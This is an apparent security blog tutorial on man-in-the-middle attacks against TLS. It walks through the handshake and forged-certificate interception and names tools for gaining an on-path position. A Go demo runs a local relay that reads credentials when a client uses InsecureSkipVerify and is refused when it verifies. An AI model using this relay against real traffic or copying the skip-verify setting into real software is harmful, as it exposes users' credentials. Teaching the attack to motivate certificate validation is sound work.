
Intercepting Sessions Through a Man-in-the-Middle Attack (MiTM)

A MiTM is an eavesdropping attack carried out by inserting a relay or proxy into a communication session. The attacker may exploit the intercepted information in real time or after the fact. The legitimate users are not aware of the attack, or that their connection has been compromised. It works against plain HTTP and, when the client can be made to accept the attacker's certificate, against HTTPS as well.


By means of this attack, an attacker can:

i. Run denial-of-service (DoS) attacks

ii. Intercept data

iii. Collect passwords

iv. Manipulate data

v. Tap VoIP phone calls


Two Types of MiTM:

  1. Eavesdropping

- Happens when an attacker receives a copy of the data communication stream and reads it without altering it.

- Not using security mechanisms such as IPsec, SSH or SSL/TLS leaves the data readable by an unauthorized user.


2. Manipulation

- A step beyond eavesdropping: the attacker alters the traffic in transit instead of only reading it.

- Typically carried out from an on-path position obtained by ARP poisoning.



How do attackers defeat Secured Communication?



The client has a TCP connection to the server and asks for an SSL/TLS session by sending an unencrypted ClientHello that lists the options it can use to set up the secure connection: the highest protocol version it supports and the cipher suites it accepts. The server replies, still in the clear, with a ServerHello that fixes the version and cipher suite to be used, followed by its certificate (which carries its public key) and a ServerHelloDone message that closes the server's part of the setup. With RSA key exchange the client then sends a ClientKeyExchange containing a premaster secret encrypted with the server's public key; both sides derive the session keys from it. The client sends a ChangeCipherSpec message, switching to the negotiated keys, and an encrypted Finished message. (This is the RSA key exchange of SSL 3.0 through TLS 1.2; TLS 1.3 uses ephemeral Diffie-Hellman instead, but the certificate step the attack targets is the same.)



The server answers with its own ChangeCipherSpec and Finished messages. The handshake is complete and the client and server can communicate over the encrypted connection.



Now the MiTM comes into play


The client sends its ClientHello, but the communication path has been subverted so that the message reaches the attacker instead of the server. The attacker forwards the same ClientHello to the server. The server believes it came from the real client and answers with its ServerHello, which the attacker copies and passes on to the client. The server sends its real certificate to the attacker; the attacker sends the client a certificate for the server's name that carries the attacker's own public key. This is a fake certificate created by the attacker, and the attack only works if the client accepts it: either the client does not validate certificates at all, or the attacker has obtained it from a CA the client trusts (or has installed his own CA in the client's trust store). The client key exchange is then carried out between client and attacker, while a second, independent key exchange is carried out between attacker and server.




Clear view of MiTM


This creates two separate encrypted connections with the attacker in the middle. Client and attacker communicate securely, with the client believing it is talking to the server; attacker and server do the same, with the server believing it is talking to the client. The attacker decrypts and re-encrypts every message going in either direction, and so sees, and can alter, everything that is transmitted.
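The handshake and the two-session structure described above, as an added example that is not part of the original post: a Go program that builds a trusted CA, a server certificate issued by it, and an attacker's forged certificate for the same name (`bank.example`, a hypothetical host), then runs client, attacker and server over loopback TCP so that the attacker terminates the client's TLS session with the forged certificate, opens its own properly verified session to the real server, and reads the plaintext while relaying it. The same program shows the check that defeats the attack: run with a client that validates the certificate against the trusted CA, the handshake is refused and the attacker sees nothing. The host name, the credentials sent and the echo reply are constructed for the example.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"net"
	"time"
)

const host = "bank.example" // hypothetical server name used in every certificate

// newCert issues a certificate for host: self-signed when parent is nil (the CA, or the forged leaf), else signed by parent.
func newCert(cn string, isCA bool, parent *x509.Certificate, parentKey *ecdsa.PrivateKey) (tls.Certificate, *x509.Certificate, *ecdsa.PrivateKey) {
	key, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	serial, _ := rand.Int(rand.Reader, new(big.Int).Lsh(big.NewInt(1), 62))
	tmpl := &x509.Certificate{
		SerialNumber: serial, Subject: pkix.Name{CommonName: cn}, DNSNames: []string{host},
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(time.Hour),
		IsCA: isCA, BasicConstraintsValid: true,
	}
	signer, signerKey := tmpl, key // self-signed unless a parent is given
	if parent != nil {
		signer, signerKey = parent, parentKey
	}
	der, _ := x509.CreateCertificate(rand.Reader, tmpl, signer, &key.PublicKey, signerKey)
	leaf, _ := x509.ParseCertificate(der)
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key, Leaf: leaf}, leaf, key
}

// serve accepts one TLS connection on a fresh loopback port and hands it to fn.
func serve(cfg *tls.Config, fn func(*tls.Conn)) string {
	ln, _ := net.Listen("tcp", "127.0.0.1:0")
	go func() {
		defer ln.Close()
		if raw, err := ln.Accept(); err == nil {
			fn(tls.Server(raw, cfg))
		}
	}()
	return ln.Addr().String()
}

// intercept runs client -> attacker -> server and returns the plaintext the attacker could read and
// the reply the client received. verify selects whether the client checks the certificate it is shown.
func intercept(verify bool) (seen, reply string, err error) {
	_, caCert, caKey := newCert("Trusted Root CA", true, nil, nil)
	serverCert, _, _ := newCert(host, false, caCert, caKey)
	forgedCert, _, _ := newCert(host, false, nil, nil) // right name, attacker's key, no trusted issuer
	pool := x509.NewCertPool()
	pool.AddCert(caCert)
	// Real server: echoes whatever it receives over its TLS session.
	serverAddr := serve(&tls.Config{Certificates: []tls.Certificate{serverCert}}, func(c *tls.Conn) {
		defer c.Close()
		buf := make([]byte, 256)
		if n, err := c.Read(buf); err == nil {
			c.Write(append([]byte("server got: "), buf[:n]...))
		}
	})
	// Attacker: terminates the client's TLS with the forged certificate, opens its own verified session to the real server, relays bytes.
	captured := make(chan string, 1)
	attackerAddr := serve(&tls.Config{Certificates: []tls.Certificate{forgedCert}}, func(toClient *tls.Conn) {
		defer toClient.Close()
		buf := make([]byte, 256)
		n, err := toClient.Read(buf) // plaintext: decrypted with the attacker's own key
		if err != nil {
			captured <- "" // the client refused the forged certificate during the handshake
			return
		}
		captured <- string(buf[:n])
		if toServer, err := tls.Dial("tcp", serverAddr, &tls.Config{RootCAs: pool, ServerName: host}); err == nil {
			defer toServer.Close()
			toServer.Write(buf[:n]) // re-encrypted under the attacker's own session with the real server
			if m, err := toServer.Read(buf); err == nil {
				toClient.Write(buf[:m])
			}
		}
	})

	// Client: InsecureSkipVerify is the "accept any certificate" behaviour the attack depends on.
	cli, err := tls.Dial("tcp", attackerAddr, &tls.Config{ServerName: host, RootCAs: pool, InsecureSkipVerify: !verify})
	if err != nil {
		return <-captured, "", err // handshake refused; the attacker learned nothing
	}
	defer cli.Close()
	cli.Write([]byte("login=alice&password=hunter2")) // constructed sample secret
	buf := make([]byte, 256)
	n, err := cli.Read(buf)
	return <-captured, string(buf[:n]), err
}

func main() {
	fmt.Println(intercept(false)) // attacker sees the credentials, client gets the server's reply
	fmt.Println(intercept(true))  // x509 unknown-authority error, attacker sees nothing
}
```

Run it with `go run`. The only difference between the intercepted run and the refused one is the client's `InsecureSkipVerify` setting; that flag, or an attacker-controlled CA added to the client's trust store, is exactly what the attack depends on. Note that the attacker's own connection to the real server is fully verified: from the server's side the session looks legitimate, which is why the server cannot detect the interception either.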


Detecting this attack is difficult because, from the user's side, nothing visibly changes: the page loads and the connection is encrypted. The one signal a client normally gives is a certificate warning for the attacker's fake certificate, and an attacker whose CA is already in the trust store removes even that. Having detected the attack once is no assurance against the next attempt; the protection is to validate certificates strictly and never click through such warnings.


To make this attack succeed, the attacker first has to get the client's traffic to pass through a proxy under his control rather than go directly to the real server. Some well-known ways to establish a MiTM position are:

  1. A web proxy such as WebScarab-NG or Zed Attack Proxy (ZAP), with the client configured to use it

  2. ARP poisoning on the local network, for example with Subterfuge

  3. A malicious Wi-Fi access point

We will cover each of the above in a practical way in later posts. Stay tuned so you never miss an update.


© AbridgedUp 2021 
